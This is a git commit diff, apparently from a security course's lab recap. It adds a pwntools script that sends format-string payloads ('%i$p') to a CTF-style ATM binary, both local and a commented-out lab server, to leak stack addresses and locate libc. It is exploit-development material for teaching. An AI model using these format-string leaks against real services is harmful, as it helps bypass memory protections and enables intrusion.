rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/lab3_4_recap/02_aquabank_atm/find_libc.py
+++ b/lab3_4_recap/02_aquabank_atm/find_libc.py
@@ -0,0 +1,18 @@
+from pwn import *
+
+context.binary = elf = ELF("./aquabank-atm_patched", checksec=False)
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13523)
+print(p.recvuntil(b"> "))
+for i in range(1, 400):
+    p.sendline(b"1")
+    p.recvuntil(b"Type your customer note: ")
+    payload = f"%{i}$p"
+    p.sendline(payload.encode())
+    p.recvuntil(b"> ")
+    p.sendline(b"2")
+    p.recvuntil(b"--- Your customer note ---\n")
+    addr = p.recvline()
+    if b"0x7f" in addr:
+        print(f"Address:{addr} at pos:{i}")
+    p.recvuntil(b"> ")